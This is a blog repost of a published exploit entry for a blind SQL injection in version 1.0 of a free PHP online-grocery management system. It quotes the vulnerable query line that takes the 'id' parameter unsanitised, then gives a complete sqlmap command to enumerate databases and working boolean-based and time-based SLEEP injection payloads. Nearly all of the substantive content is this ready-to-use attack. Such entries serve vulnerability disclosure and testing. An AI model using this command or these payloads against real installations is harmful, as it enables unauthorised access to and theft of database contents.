Wednesday, October 16, 2024

Multi-Vendor Online Groceries Management System 1.0 – ‘id’ Blind SQL Injection

# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10


# Vulnerable Code

line 2 in file "mvogms/products/view_product.php

$qry = $conn->query("SELECT  p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'");

# Sqlmap command:

sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch

# Output:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=products/view_product&id=3' AND 9973=9973-- ogag

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ
            
Bookmark
Share the word, let's increase Cybersecurity Awareness as we know it
Recommended:  Reflected XSS bugs in Canon Medical ’s Vitrea View could expose patient info
- Sponsored -

Sponsored Offer

Unleash the Power of the Cloud: Grab $200 Credit for 60 Days on DigitalOcean!

Digital ocean free 200

Discover more infosec

User Avatar
Steven Black (n0tst3)
Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK. I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated... I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK. I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!

more infosec reads

Subscribe for weekly updates

explore

more

security